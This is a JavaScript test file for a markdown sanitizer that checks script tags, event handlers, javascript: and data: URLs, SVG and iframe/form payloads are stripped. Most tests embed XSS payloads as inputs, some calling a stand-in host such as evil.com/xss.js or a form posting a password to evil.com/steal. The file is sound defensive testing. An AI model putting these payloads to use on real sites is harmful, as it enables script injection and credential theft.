mirror of
https://github.com/tdurieux/anonymous_github.git
synced 2026-04-21 12:56:05 +02:00
293 lines
9.8 KiB
JavaScript
293 lines
9.8 KiB
JavaScript
const { expect } = require("chai");
|
|
const { marked } = require("marked");
|
|
const sanitizeHtml = require("sanitize-html");
|
|
|
|
const sanitizeOptions = {
|
|
allowedTags: sanitizeHtml.defaults.allowedTags.concat([
|
|
"img",
|
|
"video",
|
|
"input",
|
|
"details",
|
|
"summary",
|
|
"del",
|
|
"ins",
|
|
"sup",
|
|
"sub",
|
|
]),
|
|
allowedAttributes: {
|
|
...sanitizeHtml.defaults.allowedAttributes,
|
|
img: ["src", "srcset", "alt", "title", "width", "height", "loading"],
|
|
video: ["src", "controls", "title"],
|
|
input: ["type", "checked", "disabled"],
|
|
code: ["class"],
|
|
span: ["class"],
|
|
div: ["class"],
|
|
pre: ["class"],
|
|
td: ["align"],
|
|
th: ["align"],
|
|
},
|
|
allowedSchemes: ["http", "https", "mailto"],
|
|
};
|
|
|
|
/**
|
|
* Mirrors the server-side rendering pipeline in webview.ts:
|
|
* sanitizeHtml(marked(content, opts), sanitizeOptions)
|
|
*/
|
|
function renderAndSanitize(markdown) {
|
|
const raw = marked(markdown, { headerIds: false, mangle: false });
|
|
return sanitizeHtml(raw, sanitizeOptions);
|
|
}
|
|
|
|
describe("Markdown sanitization", function () {
|
|
// ---------------------------------------------------------------
|
|
// Script injection
|
|
// ---------------------------------------------------------------
|
|
describe("removes script tags", function () {
|
|
it("strips inline <script> tags", function () {
|
|
const html = renderAndSanitize('<script>alert("xss")</script>');
|
|
expect(html).to.not.include("<script");
|
|
expect(html).to.not.include("alert(");
|
|
});
|
|
|
|
it("strips script tags with src attribute", function () {
|
|
const html = renderAndSanitize(
|
|
'<script src="https://evil.com/xss.js"></script>'
|
|
);
|
|
expect(html).to.not.include("<script");
|
|
expect(html).to.not.include("evil.com");
|
|
});
|
|
|
|
it("strips script tags embedded in markdown", function () {
|
|
const html = renderAndSanitize(
|
|
"# Hello\n\n<script>document.cookie</script>\n\nWorld"
|
|
);
|
|
expect(html).to.not.include("<script");
|
|
expect(html).to.include("Hello");
|
|
expect(html).to.include("World");
|
|
});
|
|
});
|
|
|
|
// ---------------------------------------------------------------
|
|
// Event handler injection
|
|
// ---------------------------------------------------------------
|
|
describe("removes event handlers", function () {
|
|
it("strips onerror handler on img", function () {
|
|
const html = renderAndSanitize('<img src=x onerror="alert(1)">');
|
|
expect(html).to.not.include("onerror");
|
|
});
|
|
|
|
it("strips onload handler on img", function () {
|
|
const html = renderAndSanitize(
|
|
'<img src="valid.png" onload="alert(1)">'
|
|
);
|
|
expect(html).to.not.include("onload");
|
|
});
|
|
|
|
it("strips onmouseover handler on a tag", function () {
|
|
const html = renderAndSanitize(
|
|
'<a href="#" onmouseover="alert(1)">hover me</a>'
|
|
);
|
|
expect(html).to.not.include("onmouseover");
|
|
expect(html).to.include("hover me");
|
|
});
|
|
|
|
it("strips onfocus handler on input", function () {
|
|
const html = renderAndSanitize('<input onfocus="alert(1)" autofocus>');
|
|
expect(html).to.not.include("onfocus");
|
|
});
|
|
});
|
|
|
|
// ---------------------------------------------------------------
|
|
// javascript: URLs
|
|
// ---------------------------------------------------------------
|
|
describe("removes javascript: URLs", function () {
|
|
it("strips javascript: href in anchor", function () {
|
|
const html = renderAndSanitize(
|
|
'<a href="javascript:alert(1)">click</a>'
|
|
);
|
|
expect(html).to.not.include("javascript:");
|
|
});
|
|
|
|
it("strips javascript: href in markdown link syntax", function () {
|
|
const html = renderAndSanitize("[click](javascript:alert(1))");
|
|
expect(html).to.not.include("javascript:");
|
|
});
|
|
});
|
|
|
|
// ---------------------------------------------------------------
|
|
// iframe / object / embed
|
|
// ---------------------------------------------------------------
|
|
describe("removes dangerous elements", function () {
|
|
it("strips iframe", function () {
|
|
const html = renderAndSanitize(
|
|
'<iframe src="https://evil.com"></iframe>'
|
|
);
|
|
expect(html).to.not.include("<iframe");
|
|
});
|
|
|
|
it("strips object tag", function () {
|
|
const html = renderAndSanitize(
|
|
'<object data="malware.swf"></object>'
|
|
);
|
|
expect(html).to.not.include("<object");
|
|
});
|
|
|
|
it("strips embed tag", function () {
|
|
const html = renderAndSanitize('<embed src="malware.swf">');
|
|
expect(html).to.not.include("<embed");
|
|
});
|
|
|
|
it("strips form tag", function () {
|
|
const html = renderAndSanitize(
|
|
'<form action="https://evil.com/steal"><input type="text" name="password"></form>'
|
|
);
|
|
expect(html).to.not.include("<form");
|
|
});
|
|
});
|
|
|
|
// ---------------------------------------------------------------
|
|
// SVG-based attacks
|
|
// ---------------------------------------------------------------
|
|
describe("removes SVG-based XSS", function () {
|
|
it("strips svg with onload", function () {
|
|
const html = renderAndSanitize('<svg onload="alert(1)">');
|
|
expect(html).to.not.include("onload");
|
|
});
|
|
|
|
it("strips svg with embedded script", function () {
|
|
const html = renderAndSanitize(
|
|
"<svg><script>alert(1)</script></svg>"
|
|
);
|
|
expect(html).to.not.include("<script");
|
|
});
|
|
});
|
|
|
|
// ---------------------------------------------------------------
|
|
// data: URL attacks
|
|
// ---------------------------------------------------------------
|
|
describe("removes data: URL attacks", function () {
|
|
it("strips data:text/html href", function () {
|
|
const html = renderAndSanitize(
|
|
'<a href="data:text/html,<script>alert(1)</script>">click</a>'
|
|
);
|
|
expect(html).to.not.include("data:text/html");
|
|
});
|
|
});
|
|
|
|
// ---------------------------------------------------------------
|
|
// style-based attacks
|
|
// ---------------------------------------------------------------
|
|
describe("removes style-based attacks", function () {
|
|
it("strips style tags with expressions", function () {
|
|
const html = renderAndSanitize(
|
|
"<style>body { background: url('javascript:alert(1)') }</style>"
|
|
);
|
|
expect(html).to.not.include("javascript:");
|
|
});
|
|
});
|
|
|
|
// ---------------------------------------------------------------
|
|
// Safe content is preserved
|
|
// ---------------------------------------------------------------
|
|
describe("preserves safe markdown content", function () {
|
|
it("preserves headings", function () {
|
|
const html = renderAndSanitize("# Heading 1\n## Heading 2");
|
|
expect(html).to.include("<h1>");
|
|
expect(html).to.include("Heading 1");
|
|
expect(html).to.include("<h2>");
|
|
});
|
|
|
|
it("preserves paragraphs", function () {
|
|
const html = renderAndSanitize("Hello world\n\nSecond paragraph");
|
|
expect(html).to.include("<p>");
|
|
expect(html).to.include("Hello world");
|
|
});
|
|
|
|
it("preserves bold and italic", function () {
|
|
const html = renderAndSanitize("**bold** and *italic*");
|
|
expect(html).to.include("<strong>bold</strong>");
|
|
expect(html).to.include("<em>italic</em>");
|
|
});
|
|
|
|
it("preserves links", function () {
|
|
const html = renderAndSanitize("[example](https://example.com)");
|
|
expect(html).to.include("https://example.com");
|
|
expect(html).to.include("example");
|
|
});
|
|
|
|
it("preserves images", function () {
|
|
const html = renderAndSanitize(
|
|
""
|
|
);
|
|
expect(html).to.include("<img");
|
|
expect(html).to.include("https://example.com/img.png");
|
|
});
|
|
|
|
it("preserves code blocks", function () {
|
|
const html = renderAndSanitize("```js\nconsole.log('hi')\n```");
|
|
expect(html).to.include("<code");
|
|
expect(html).to.include("console.log");
|
|
});
|
|
|
|
it("preserves inline code", function () {
|
|
const html = renderAndSanitize("Use `npm install` to install");
|
|
expect(html).to.include("<code>npm install</code>");
|
|
});
|
|
|
|
it("preserves unordered lists", function () {
|
|
const html = renderAndSanitize("- item 1\n- item 2\n- item 3");
|
|
expect(html).to.include("<ul>");
|
|
expect(html).to.include("<li>");
|
|
expect(html).to.include("item 1");
|
|
});
|
|
|
|
it("preserves ordered lists", function () {
|
|
const html = renderAndSanitize("1. first\n2. second");
|
|
expect(html).to.include("<ol>");
|
|
expect(html).to.include("first");
|
|
});
|
|
|
|
it("preserves blockquotes", function () {
|
|
const html = renderAndSanitize("> This is a quote");
|
|
expect(html).to.include("<blockquote>");
|
|
expect(html).to.include("This is a quote");
|
|
});
|
|
|
|
it("preserves tables", function () {
|
|
const html = renderAndSanitize("| A | B |\n|---|---|\n| 1 | 2 |");
|
|
expect(html).to.include("<table>");
|
|
expect(html).to.include("<th>");
|
|
expect(html).to.include("<td>");
|
|
});
|
|
|
|
it("preserves horizontal rules", function () {
|
|
const html = renderAndSanitize("---");
|
|
expect(html).to.include("<hr");
|
|
});
|
|
});
|
|
|
|
// ---------------------------------------------------------------
|
|
// Mixed: malicious + safe content
|
|
// ---------------------------------------------------------------
|
|
describe("handles mixed content", function () {
|
|
it("strips malicious parts while keeping safe parts", function () {
|
|
const html = renderAndSanitize(
|
|
'# Title\n\nSafe paragraph.\n\n<script>alert("xss")</script>\n\n**Bold text**'
|
|
);
|
|
expect(html).to.not.include("<script");
|
|
expect(html).to.include("Title");
|
|
expect(html).to.include("Safe paragraph");
|
|
expect(html).to.include("<strong>Bold text</strong>");
|
|
});
|
|
|
|
it("strips event handlers from otherwise-safe tags", function () {
|
|
const html = renderAndSanitize(
|
|
'<img src="photo.jpg" alt="photo" onerror="alert(1)">'
|
|
);
|
|
expect(html).to.not.include("onerror");
|
|
expect(html).to.include("photo.jpg");
|
|
expect(html).to.include('alt="photo"');
|
|
});
|
|
});
|
|
});
|